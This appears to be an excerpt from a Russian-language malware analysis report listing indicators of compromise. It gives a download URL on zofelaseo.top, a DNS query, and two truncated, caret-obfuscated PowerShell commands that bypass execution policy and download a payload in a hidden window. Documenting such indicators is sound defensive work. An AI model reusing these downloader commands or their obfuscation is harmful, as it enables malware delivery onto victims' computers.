Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powE^R^S^hELl.e^xE -exE^c^u^tI^ON^pO^liCY^ B^YPaS^S^ -nOP^roF^i^lE ^-wiNDOwStY^le^ HId^d^EN^ (n^E^w-o^bjecT SYsT^em^.^neT.w^eBC^li^EN^t^).DO^WNLoa^dfiLe^('http://zofelaseo.top/...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "powE^R^S^hELl.e^xE -exE^c^u^tI^ON^pO^liCY^ B^YPaS^S^ -nOP^roF^i^lE ^-wiNDOwStY^le^ HId^d^EN^ (n^E^w-o^bjecT SYsT^em^.^neT.w^eBC^li^EN^t^).DO^WNLoa^dfiLe^('http://zofelaseo.top/...' (со скрытым окном)